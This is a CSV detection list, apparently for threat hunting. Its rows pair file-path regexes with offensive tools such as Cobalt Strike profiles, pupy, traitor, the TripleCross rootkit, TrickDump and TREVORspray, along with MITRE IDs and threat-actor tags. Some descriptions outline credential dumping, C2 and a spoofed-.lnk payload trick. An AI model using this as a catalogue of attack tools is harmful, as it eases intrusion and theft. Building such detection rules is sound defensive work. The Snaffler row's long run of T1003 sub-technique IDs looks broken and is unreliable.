"*/tor-browser-win32*.*",".{0,1000}\/tor\-browser\-win32.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","12056"
"*/tor-browser-win64*.*",".{0,1000}\/tor\-browser\-win64.{0,1000}\..{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","12057"
"*/tor-consensus-checker.nse*",".{0,1000}\/tor\-consensus\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12058"
"*/tor-gencert.exe*",".{0,1000}\/tor\-gencert\.exe.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","#linux","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","12059"
"*/tor-geoipdb.list*",".{0,1000}\/tor\-geoipdb\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12060"
"*/tor-package-archive/*",".{0,1000}\/tor\-package\-archive\/.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","1","N/A","N/A","9","10","N/A","N/A","N/A","N/A","12061"
"*/torsocks.conf",".{0,1000}\/torsocks\.conf","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12062"
"*/torsocks.list*",".{0,1000}\/torsocks\.list.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","N/A","Dispossessor - APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A","12063"
"*/tor-static-windows-amd64.zip*",".{0,1000}\/tor\-static\-windows\-amd64\.zip.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","1","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","12064"
"*/TotalRecall.git*",".{0,1000}\/TotalRecall\.git.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","1","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","12065"
"*/totalrecall.py*",".{0,1000}\/totalrecall\.py.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","1","N/A","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","12066"
"*/TotalRecall.txt*",".{0,1000}\/TotalRecall\.txt.{0,1000}","offensive_tool_keyword","TotalRecall","extracts and displays data from the Recall feature in Windows 11","T1005 - T1113 - T1056.001 - T1003","TA0009 - TA0010 - TA0006 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/xaitax/TotalRecall","1","0","#linux","N/A","10","10","2011","159","2024-06-08T09:25:08Z","2024-06-03T16:38:04Z","12067"
"*/toteslegit.ps1*",".{0,1000}\/toteslegit\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","12068"
"*/traceroute-geolocation.nse*",".{0,1000}\/traceroute\-geolocation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12069"
"*/tracers_fuzzer.cc*",".{0,1000}\/tracers_fuzzer\.cc.{0,1000}","offensive_tool_keyword","3snake","Tool for extracting information from newly spawned processes","T1003 - T1110 - T1552 - T1505","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/blendin/3snake","1","0","N/A","N/A","7","8","752","109","2022-02-14T17:42:10Z","2018-02-07T21:03:15Z","12070"
"*/trackerjacker*",".{0,1000}\/trackerjacker.{0,1000}","offensive_tool_keyword","trackerjacker","Like nmap for mapping wifi networks you're not connected to. Maps and tracks wifi networks and devices through raw 802.11 monitoring.","T1040 - T1018 - T1591","TA0007  -  - TA0043","N/A","N/A","Discovery","https://github.com/calebmadrigal/trackerjacker","1","0","#linux","N/A","N/A","10","2672","190","2024-01-16T05:10:22Z","2016-12-18T22:01:13Z","12071"
"*/Trackflaw/CVE*.py*",".{0,1000}\/Trackflaw\/CVE.{0,1000}\.py.{0,1000}","offensive_tool_keyword","poc","Simple and dirty PoC of the CVE-2023-23397 vulnerability impacting the Outlook thick client.","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","APT28 - STRONTIUM - Sednit - Sofacy - Fancy Bear","Exploitation tool","https://github.com/Trackflaw/CVE-2023-23397","1","1","N/A","N/A","N/A","2","123","26","2023-03-24T10:46:38Z","2023-03-20T16:31:54Z","12072"
"*/traitor/pkg/backdoor*",".{0,1000}\/traitor\/pkg\/backdoor.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12073"
"*/traitor/releases/download/*",".{0,1000}\/traitor\/releases\/download\/.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12074"
"*/traitor-386*",".{0,1000}\/traitor\-386.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12075"
"*/traitor-amd64*",".{0,1000}\/traitor\-amd64.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12076"
"*/traitor-arm64*",".{0,1000}\/traitor\-arm64.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","12077"
"*/transports/scramblesuit/*.py*",".{0,1000}\/transports\/scramblesuit\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","12078"
"*/trap_command.py*",".{0,1000}\/trap_command\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","12079"
"*/TreeWalker.cs*",".{0,1000}\/TreeWalker\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","N/A","10","2341","232","2025-04-03T04:19:29Z","2020-03-30T07:03:47Z","12080"
"*/TREVORspray.git*",".{0,1000}\/TREVORspray\.git.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","12081"
"*/trevorspray.log*",".{0,1000}\/trevorspray\.log.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","#logfile","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","12082"
"*/trganda/CVE-2022-23131*",".{0,1000}\/trganda\/CVE\-2022\-23131.{0,1000}","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/trganda/CVE-2022-23131","1","1","N/A","N/A","N/A","1","1","1","2022-02-24T11:50:28Z","2022-02-24T08:10:46Z","12083"
"*/trick_ryuk.profile*",".{0,1000}\/trick_ryuk\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","12084"
"*/trickbot.profile*",".{0,1000}\/trickbot\.profile.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","N/A","10","10","362","46","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z","12085"
"*/TrickDump.git*",".{0,1000}\/TrickDump\.git.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","1","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","12086"
"*/tricky.lnk.git*",".{0,1000}\/tricky\.lnk\.git.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","12087"
"*/tricky.ps1*",".{0,1000}\/tricky\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","12088"
"*/tricky.vbs*",".{0,1000}\/tricky\.vbs.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","12089"
"*/tricky2.ps1*",".{0,1000}\/tricky2\.ps1.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","1","N/A","N/A","N/A","2","114","33","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z","12090"
"*/tried_logins.txt*",".{0,1000}\/tried_logins\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","#linux","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","12091"
"*/TriggerLinux/*",".{0,1000}\/TriggerLinux\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12092"
"*/TripleCross.git*",".{0,1000}\/TripleCross\.git.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","12093"
"*/TripleCross/apps/*",".{0,1000}\/TripleCross\/apps\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","12094"
"*/TripleCross-0.1.0.zip*",".{0,1000}\/TripleCross\-0\.1\.0\.zip.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","12095"
"*/TripleCross-0.1.0/*",".{0,1000}\/TripleCross\-0\.1\.0\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","12096"
"*/trojan.exe*",".{0,1000}\/trojan\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","12097"
"*/trollsploit/*",".{0,1000}\/trollsploit\/.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1154","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","12098"
"*/TROUBLE-1/Vajra*",".{0,1000}\/TROUBLE\-1\/Vajra.{0,1000}","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","N/A","4","391","61","2025-02-21T16:40:23Z","2022-03-01T14:31:27Z","12099"
"*/truesocks_rs.git*",".{0,1000}\/truesocks_rs\.git.{0,1000}","offensive_tool_keyword","TrueSocks","Simple API for buying renting and managing proxies","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","Defense Evasion","https://github.com/c0dn/truesocks_rs","1","1","N/A","N/A","10","1","0","0","2023-05-09T01:00:05Z","2023-04-06T02:32:04Z","12100"
"*/trufflehog.git*",".{0,1000}\/trufflehog\.git.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","1","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","12101"
"*/trufflehog/releases/download/*",".{0,1000}\/trufflehog\/releases\/download\/.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","1","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","12102"
